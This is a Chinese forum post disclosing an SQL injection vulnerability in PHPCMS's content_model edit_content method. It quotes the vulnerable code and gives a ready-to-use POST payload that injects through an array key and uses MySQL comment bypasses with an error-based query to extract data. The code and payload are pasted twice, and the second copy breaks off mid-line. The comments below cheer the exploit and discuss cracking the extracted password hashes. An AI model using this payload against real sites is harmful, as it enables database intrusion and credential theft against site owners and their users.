PHPCMS SQL注入漏洞
edit_content方法位于: content_model.class.php
代码如下:
//主表
$this->table_name = $this->db_tablepre.$model_tablename;
$this->update($systeminfo,array('id'=>$id));
//附属表
$this->table_name = $this->table_name.'_data';
$this->update($modelinfo,array('id'=>$id));
$this->search_api($id,$inputinfo);
=====================
漏洞利用 :POST提交:
dosubmit=1&info[catid]=6&info[`content` %3d1 where id%3d1 aNd (/*!50000select*/ 1 FROM (/*!50000select*/ count(*),concat(floor(rand(0)*2),(substring((/*!50000select*/ (version())),1,62)))a from information_schema.tables group by a)b); %23 ]=a&id=53&info[name]=b&info[isunique]=s
代码如下:
//主表
$this->table_name = $this->db_tablepre.$model_tablename;
$this->update($systeminfo,array('id'=>$id));
//附属表
$this->table_name = $this->table_name.'_data';
$this->update($modelinfo,array('id'=>$id));
$this->search_api($id,$inputinfo);
=====================
漏洞利用 :POST提交:
dosubmit=1&info[catid]=6&info[`content` %3d1 where id%3d1 aNd (/*!50000select*/ 1 FROM (/*!50000select*/ count(*),concat(floor(rand(0)*2),(substring((/*!50000select*/ (version())),1,62)))a from information_schema.tables group by a)b); %23 ]=a&id=53&info
评论92次
是滴,打击面不广
见洞必须插
给力啊~这个应该需要注册会员吧?
一大早起来就发现惊喜了
相当给力了!!
顶啊 非常给力
给力呀~~~~
可惜phpcms的加密算法比较蛋疼,即使弄出来md5,但是还是破解不出来
一大早发漏洞 顶了
很好, +1 广告位出租
360挖洞大神啊!!1
各位多给我加点积分吧